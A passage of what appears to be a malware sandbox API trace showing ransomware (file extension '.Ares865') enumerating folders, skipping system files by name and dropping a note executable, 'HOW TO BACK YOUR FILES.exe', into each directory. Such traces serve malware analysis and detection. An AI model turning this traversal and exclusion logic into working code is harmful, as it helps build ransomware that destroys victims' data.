hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4d47de60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x89380, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Lighthouse.jpg.Ares865", cAlternateFileName="LIGHTH~1.ARE")) returned 1 [0057.392] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.392] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0057.393] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2=".") returned 1 [0057.393] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="..") returned 1 [0057.393] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="windows") returned -1 [0057.393] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="bootmgr") returned 1 [0057.393] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="temp") returned -1 [0057.393] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="pagefile.sys") returned -1 [0057.393] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="boot") returned 1 [0057.393] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="ids.txt") returned 1 [0057.393] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="ntuser.dat") returned -1 [0057.393] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="perflogs") returned -1 [0057.393] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="MSBuild") returned -1 [0057.393] lstrlenW (lpString="Lighthouse.jpg.Ares865") returned 22 [0057.393] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\Koala.jpg.Ares865") returned 71 [0057.393] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Lighthouse.jpg.Ares865" | out: lpString1="Lighthouse.jpg.Ares865") returned="Lighthouse.jpg.Ares865" [0057.393] lstrlenW (lpString="Lighthouse.jpg.Ares865") returned 22 [0057.393] lstrlenW (lpString="Ares865") returned 7 [0057.393] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.393] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4d5ae960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xbe170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Penguins.jpg.Ares865", cAlternateFileName="")) returned 1 [0057.393] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.393] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0057.393] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2=".") returned 1 [0057.393] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="..") returned 1 [0057.393] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="windows") returned -1 [0057.393] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="bootmgr") returned 1 [0057.393] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="temp") returned -1 [0057.393] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="pagefile.sys") returned 1 [0057.393] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="boot") returned 1 [0057.393] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="ids.txt") returned 1 [0057.393] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="ntuser.dat") returned 1 [0057.393] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="perflogs") returned -1 [0057.393] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="MSBuild") returned 1 [0057.393] lstrlenW (lpString="Penguins.jpg.Ares865") returned 20 [0057.393] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\Lighthouse.jpg.Ares865") returned 76 [0057.393] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Penguins.jpg.Ares865" | out: lpString1="Penguins.jpg.Ares865") returned="Penguins.jpg.Ares865" [0057.393] lstrlenW (lpString="Penguins.jpg.Ares865") returned 20 [0057.394] lstrlenW (lpString="Ares865") returned 7 [0057.394] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.394] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x97c60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tulips.jpg.Ares865", cAlternateFileName="")) returned 1 [0057.394] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.394] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0057.394] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2=".") returned 1 [0057.394] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="..") returned 1 [0057.394] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="windows") returned -1 [0057.394] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="bootmgr") returned 1 [0057.394] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="temp") returned 1 [0057.394] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="pagefile.sys") returned 1 [0057.394] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="boot") returned 1 [0057.394] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="ids.txt") returned 1 [0057.394] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="ntuser.dat") returned 1 [0057.394] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="perflogs") returned 1 [0057.394] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="MSBuild") returned 1 [0057.394] lstrlenW (lpString="Tulips.jpg.Ares865") returned 18 [0057.394] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\Penguins.jpg.Ares865") returned 74 [0057.394] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Tulips.jpg.Ares865" | out: lpString1="Tulips.jpg.Ares865") returned="Tulips.jpg.Ares865" [0057.394] lstrlenW (lpString="Tulips.jpg.Ares865") returned 18 [0057.394] lstrlenW (lpString="Ares865") returned 7 [0057.394] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.394] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x97c60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tulips.jpg.Ares865", cAlternateFileName="")) returned 0 [0057.394] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0057.394] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bf0 [0057.394] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Documents\\My Music", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music" [0057.394] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee970 | out: hHeap=0x2b0000) returned 1 [0057.394] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0057.394] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music") returned 34 [0057.394] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents\\My Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music" [0057.394] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.394] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Documents\\My Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\documents\\my music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0057.395] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0057.395] GetLastError () returned 0x0 [0057.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0057.395] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0057.395] CloseHandle (hObject=0x118) returned 1 [0057.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0057.395] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.395] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4f6697e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f6697e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0057.395] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.395] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.395] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.396] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4f6697e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f6697e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.396] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.396] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0057.396] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.396] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.396] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0057.396] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.396] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0057.396] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0057.396] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0057.396] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0057.396] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0057.396] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0057.396] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0057.396] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0057.396] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0057.396] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0057.396] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0057.396] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0057.396] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0057.396] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\*") returned 36 [0057.396] lstrcpyW (in: lpString1=0x2cce446, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0057.396] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0057.396] lstrlenW (lpString="Ares865") returned 7 [0057.396] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.396] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4977eaa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4977eaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0057.396] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0057.396] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521b4800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521b4800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0057.396] lstrcmpiW (lpString1="Sample Music", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.396] lstrcmpiW (lpString1="Sample Music", lpString2="aoldtz.exe") returned 1 [0057.396] lstrcmpiW (lpString1="Sample Music", lpString2=".") returned 1 [0057.396] lstrcmpiW (lpString1="Sample Music", lpString2="..") returned 1 [0057.396] lstrcmpiW (lpString1="Sample Music", lpString2="windows") returned -1 [0057.396] lstrcmpiW (lpString1="Sample Music", lpString2="bootmgr") returned 1 [0057.396] lstrcmpiW (lpString1="Sample Music", lpString2="temp") returned -1 [0057.397] lstrcmpiW (lpString1="Sample Music", lpString2="pagefile.sys") returned 1 [0057.397] lstrcmpiW (lpString1="Sample Music", lpString2="boot") returned 1 [0057.397] lstrcmpiW (lpString1="Sample Music", lpString2="ids.txt") returned 1 [0057.397] lstrcmpiW (lpString1="Sample Music", lpString2="ntuser.dat") returned 1 [0057.397] lstrcmpiW (lpString1="Sample Music", lpString2="perflogs") returned 1 [0057.397] lstrcmpiW (lpString1="Sample Music", lpString2="MSBuild") returned 1 [0057.397] lstrlenW (lpString="Sample Music") returned 12 [0057.397] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\desktop.ini.Ares865") returned 54 [0057.397] lstrcpyW (in: lpString1=0x2cce446, lpString2="Sample Music" | out: lpString1="Sample Music") returned="Sample Music" [0057.397] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7be8 [0057.397] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f1fc8 [0057.397] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bf0 | out: ListHead=0x2e7710, ListEntry=0x2e7bf0) returned 0x2e7bb0 [0057.397] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521b4800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521b4800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 0 [0057.397] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0057.397] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bf0 [0057.397] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Documents\\My Music\\Sample Music", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\Sample Music") returned="C:\\Users\\Public\\Documents\\My Music\\Sample Music" [0057.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0057.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0057.397] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\Sample Music") returned 47 [0057.397] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents\\My Music\\Sample Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\Sample Music") returned="C:\\Users\\Public\\Documents\\My Music\\Sample Music" [0057.397] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.397] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Documents\\My Music\\Sample Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\documents\\my music\\sample music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0057.398] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0057.398] GetLastError () returned 0x0 [0057.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0057.398] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0057.398] CloseHandle (hObject=0x118) returned 1 [0057.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0057.398] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.398] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\Sample Music\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521b4800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521b4800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0057.398] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.398] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.398] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.398] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521b4800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521b4800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.398] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.398] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0057.398] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.398] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.398] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4f80c700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x550, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0057.398] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.398] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0057.398] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0057.399] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0057.399] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0057.399] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0057.399] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0057.399] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0057.399] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0057.399] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0057.399] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0057.399] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0057.399] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0057.399] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0057.399] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\Sample Music\\*") returned 49 [0057.399] lstrcpyW (in: lpString1=0x2cce460, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0057.399] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0057.399] lstrlenW (lpString="Ares865") returned 7 [0057.399] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.399] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x497a4c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x497a4c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0057.399] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0057.399] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4f8cade0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x806800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Kalimba.mp3.Ares865", cAlternateFileName="")) returned 1 [0057.399] lstrcmpiW (lpString1="Kalimba.mp3.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.399] lstrcmpiW (lpString1="Kalimba.mp3.Ares865", lpString2="aoldtz.exe") returned 1 [0057.399] lstrcmpiW (lpString1="Kalimba.mp3.Ares865", lpString2=".") returned 1 [0057.399] lstrcmpiW (lpString1="Kalimba.mp3.Ares865", lpString2="..") returned 1 [0057.399] lstrcmpiW (lpString1="Kalimba.mp3.Ares865", lpString2="windows") returned -1 [0057.399] lstrcmpiW (lpString1="Kalimba.mp3.Ares865", lpString2="bootmgr") returned 1 [0057.399] lstrcmpiW (lpString1="Kalimba.mp3.Ares865", lpString2="temp") returned -1 [0057.399] lstrcmpiW (lpString1="Kalimba.mp3.Ares865", lpString2="pagefile.sys") returned -1 [0057.399] lstrcmpiW (lpString1="Kalimba.mp3.Ares865", lpString2="boot") returned 1 [0057.399] lstrcmpiW (lpString1="Kalimba.mp3.Ares865", lpString2="ids.txt") returned 1 [0057.399] lstrcmpiW (lpString1="Kalimba.mp3.Ares865", lpString2="ntuser.dat") returned -1 [0057.399] lstrcmpiW (lpString1="Kalimba.mp3.Ares865", lpString2="perflogs") returned -1 [0057.399] lstrcmpiW (lpString1="Kalimba.mp3.Ares865", lpString2="MSBuild") returned -1 [0057.399] lstrlenW (lpString="Kalimba.mp3.Ares865") returned 19 [0057.399] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\Sample Music\\desktop.ini.Ares865") returned 67 [0057.399] lstrcpyW (in: lpString1=0x2cce460, lpString2="Kalimba.mp3.Ares865" | out: lpString1="Kalimba.mp3.Ares865") returned="Kalimba.mp3.Ares865" [0057.400] lstrlenW (lpString="Kalimba.mp3.Ares865") returned 19 [0057.400] lstrlenW (lpString="Ares865") returned 7 [0057.400] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.400] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, 